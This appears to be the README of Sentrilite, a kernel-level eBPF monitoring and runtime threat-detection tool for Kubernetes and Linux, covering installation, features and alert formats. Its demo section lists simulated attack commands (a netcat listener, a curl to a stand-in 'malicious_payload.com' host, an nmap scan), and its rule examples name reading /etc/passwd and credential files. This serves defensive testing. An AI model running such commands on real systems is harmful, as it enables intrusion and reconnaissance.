One command to Install ! One Click to generate Cost Intelligence Report, Vulnerability Assessment Report, Runtime Security Reports for your Multi-Cloud Workloads !

Observe Live System Telemetry with full Kubernetes Context. Rule Manager (dashboard) - Create Cost Compute/Network report, custom threat detection rules, file, process & network monitoring with a single click !

To Install:

Run the following command on your K8s Node/Linux server. Docker must be installed and running. The agent requires privileged access and host PID namespace to perform kernel-level monitoring.

sudo docker run --rm -it --name sentrilite \
  --privileged --pid=host \
  -p 8080:8080 -p 8765:8765 \
  -v /sys/fs/bpf:/sys/fs/bpf \
  -v /sys/kernel/debug:/sys/kernel/debug \
  sentrilite/local:1.0.0

Once the container is running, open a browser and navigate to: http://server-ip:8080, example: http://localhost:8080

For bug reports, feature requests reach out to [email protected]

▶ Click on the image below to watch the installation guide

▶ Click the image below to watch the live demo

• Detection of active threats during execution
• Risk scoring based on syscall + process + network behavior
• Automatic process termination for high-risk activity

This demo shows real-time detection and automatic termination of malicious activity on a live Linux system using Sentrilite.

The following commands were used for simulation:

sudo  nc -l 5000
curl http://malicious_payload.com >/dev/null 2>&1
nmap -p 22,80,443 127.0.0.1 >/dev/null 2>&1

Sentrilite is a lightweight kernel-level observability platform that delivers real-time cloud egress cost attribution and runtime threat detection across hybrid-cloud and Kubernetes infrastructure — with no code changes, no API credentials, and no billing integrations required. In Kubernetes, Sentrilite runs as a privileged DaemonSet on every node (no changes to your workloads). Each agent uses hostPID/hostNetwork to observe container processes and network flows, then enriches events with full pod metadata (namespace, pod, container, UID) by correlating cgroups with the API server.

What you get:

• Cloud Cost Intelligence: Real-time egress cost attribution across AWS, GCP, and Azure — broken down by Node → Namespace → Pod → Container → Service. Automatically flags cross-region traffic and high-volume workloads. One click generates a full Cost Intelligence Report with estimated spend per workload.
• Detection-As-Code: Add and modify detection rules instantly via JSON. Hot reload — no rebuilds, no redeploys.
• Active Response: Automatically terminate malicious processes in real time based on policy, without agent restarts or redeploys.
• Process visibility: Capture commands and args (execve) per container/pod with user, PID/PPID, and image context. Trigger rules like "alert on cat /etc/passwd" or "block high-risk binaries."
• File activity: Match sensitive file paths (config, keys, tokens) using rule packs. Flag exfiltration patterns and privilege-escalation attempts.
• Network activity: Trace socket opens and outbound/inbound connects. Create rules for destination IPs, ports, or CIDRs.
• Vulnerability Assessment: Scan your entire Kubernetes and hybrid-cloud infrastructure for misconfigurations, exposed credentials, and privilege escalation risks.
• Live operations UI: Watch streaming events per node/pod with live node health and OOMKilled notices. Filter by namespace, pod, and container in real time.
• One-Click Reports: Generate audit-ready Cost Intelligence, Runtime Security, and Vulnerability Assessment PDF reports instantly — with full context and remediation details.
• LLM-powered insights: Automatically summarize trends, explain anomalies, and suggest remediation rules from live telemetry and alerts.
• Third-party integrations: Prometheus AlertManager, PagerDuty, and more.

• Website: https://sentrilite.com
• Email: [email protected]
• Hybrid Cloud Demo: https://youtu.be/FmFUs0ZhdIY
• Linux (bare-metal) Demo: https://youtu.be/rRexG-f6YFM

• Linux Kernel with eBPF support (Linux 5.8+ recommended)
• Root privileges (for loading eBPF programs)
• Ports: 80 (dashboard), 8765 (WebSocket)
• Kubernetes (optional): Cluster access with ability to run a privileged DaemonSet

• bpftool: Load eBPF programs and manage maps sudo apt install bpftool (Ubuntu)
• libbpf & headers Required by the kernel loader (trace_events) Pre-installed on most modern distros (use bundled binary)
• nginx Required to view dashboard sudo apt install nginx

The project is currently using a trial license.key .

• Kubernetes: add URLs in a ConfigMap (e.g., ALERTMANAGER_URL, optional PAGERDUTY_EVENTS_URL) and the PagerDuty routing key in a Secret (PAGERDUTY_ROUTING_KEY).
• Standalone Linux: set the same keys in sys.conf (e.g., ALERTMANAGER_URL=http://..., PAGERDUTY_ROUTING_KEY=...; PD URL defaults to US if omitted).

Sentrilite prefers env vars (K8s) and falls back to sys.conf (bare metal). Note: Alertmanager must be reachable and supports v2 API (/api/v2/alerts). PagerDuty uses Events v2.

sudo docker run --rm -it --name sentrilite \
  --privileged --pid=host \
  -p 8080:8080 -p 8765:8765 \
  -v /sys/fs/bpf:/sys/fs/bpf \
  -v /sys/kernel/debug:/sys/kernel/debug \
  sentrilite/local:1.0.0

Once the container is running, open a browser and navigate to: http://:8080

git clone repo. cd to the charts directory and run:

helm upgrade --install sentrilite charts/sentrilite -n kube-system --create-namespace

For Kubernetes Cluster: EKS/AKS/GKE or Private Kubernetes Cluster

Helm Installation:

In the charts directory:
helm upgrade --install sentrilite charts/sentrilite -n kube-system --create-namespace

Verify installation: kubectl -n kube-system get pods -l app=sentrilite-agent -o wide

# Port forward
POD=$(kubectl -n kube-system get pod -l app=sentrilite-agent -o name | head -n1)
kubectl -n kube-system port-forward "$POD" 8080:80 8765:8765

Example Alert Message:

  {
    "time": "2025-09-07 14:55:22",
    "type": "high_risk",
    "message": "root ran a high-risk command '/bin/sudo' from IP 10.0.0.1.",
    "pid": "1546794",
    "cmd": "/bin/sudo",
    "args": "",
    "ip": "127.0.0.1",
    "risk_level": 1,
    "tags": [
      "privilege-escalation"
    ],
    "k8s_namespace": "default",
    "k8s_pod": "debug-shell",
    "k8s_container": "shell",
    "k8s_pod_uid": "092d4607-2fd3-4db7-aba5-812d0bcd4e06"
  }

For Non-Kubernetes Linux based Cluster

Run it with Docker on a Linux Server:

sudo docker run --rm -it --name sentrilite \
  --privileged --pid=host \
  -p 8080:8080 -p 8765:8765 \
  -v /sys/fs/bpf:/sys/fs/bpf \
  -v /sys/kernel/debug:/sys/kernel/debug \
  sentrilite/local:1.0.0

Once the container is running, open a browser and navigate to: http://<server-ip>:8080

OR (without docker)

1. **Unzip the bundle:**

unzip sentrilite_agent_bundle.zip
cd sentrilite

2. Load the bpf program:
sudo ./install.sh

3. Open sys.conf and configure:
IFACE=
LICENSE_KEY=./license.key
SIEM=""
PAGERDUTY_EVENTS_URL=""
PAGERDUTY_ROUTING_KEY=""
ALERTMANAGER_URL=""

4. Launch the Server:
sudo ./sentrilite

On the browser, go to: http://server-ip:8080/dashboard.html

• license.key — place in the current directory (baked in image or mounted as Secret).
• sys.conf — system and network config, placed in the current directory (baked in image or mounted as ConfigMap).
• Rule files (custom_rules.json, sensitive_files.json, security_rules.json, alerts.json) reside in the working dir; rules can be managed via the dashboard.

• Service Level Cost Breakdown: k8s_namespace, k8s_pod, k8s_container, service, Total Egress/Compute Cost.
• Events include (when available): k8s_namespace, k8s_pod, k8s_container, k8s_pod_uid.
• OOMKilled alerts and pod watchers run best-effort when the agent can access K8s APIs.

For Kubernetes Cluster: EKS/AKS/GKE or Private Kubernetes Cluster

helm uninstall sentrilite -n kube-system

OR

kubectl -n kube-system delete ds/sentrilite-agent
# (Optional) If pods hang in Terminating:
kubectl -n kube-system delete pod -l app=sentrilite-agent --force --grace-period=0

For Non-Kubernetes Linux based Cluster Run the following commands as root.

sudo ./unload_bpf.sh

For licensing, troubleshooting, or feature requests:

• 📧 [email protected]
• 🌐 https://sentrilite.com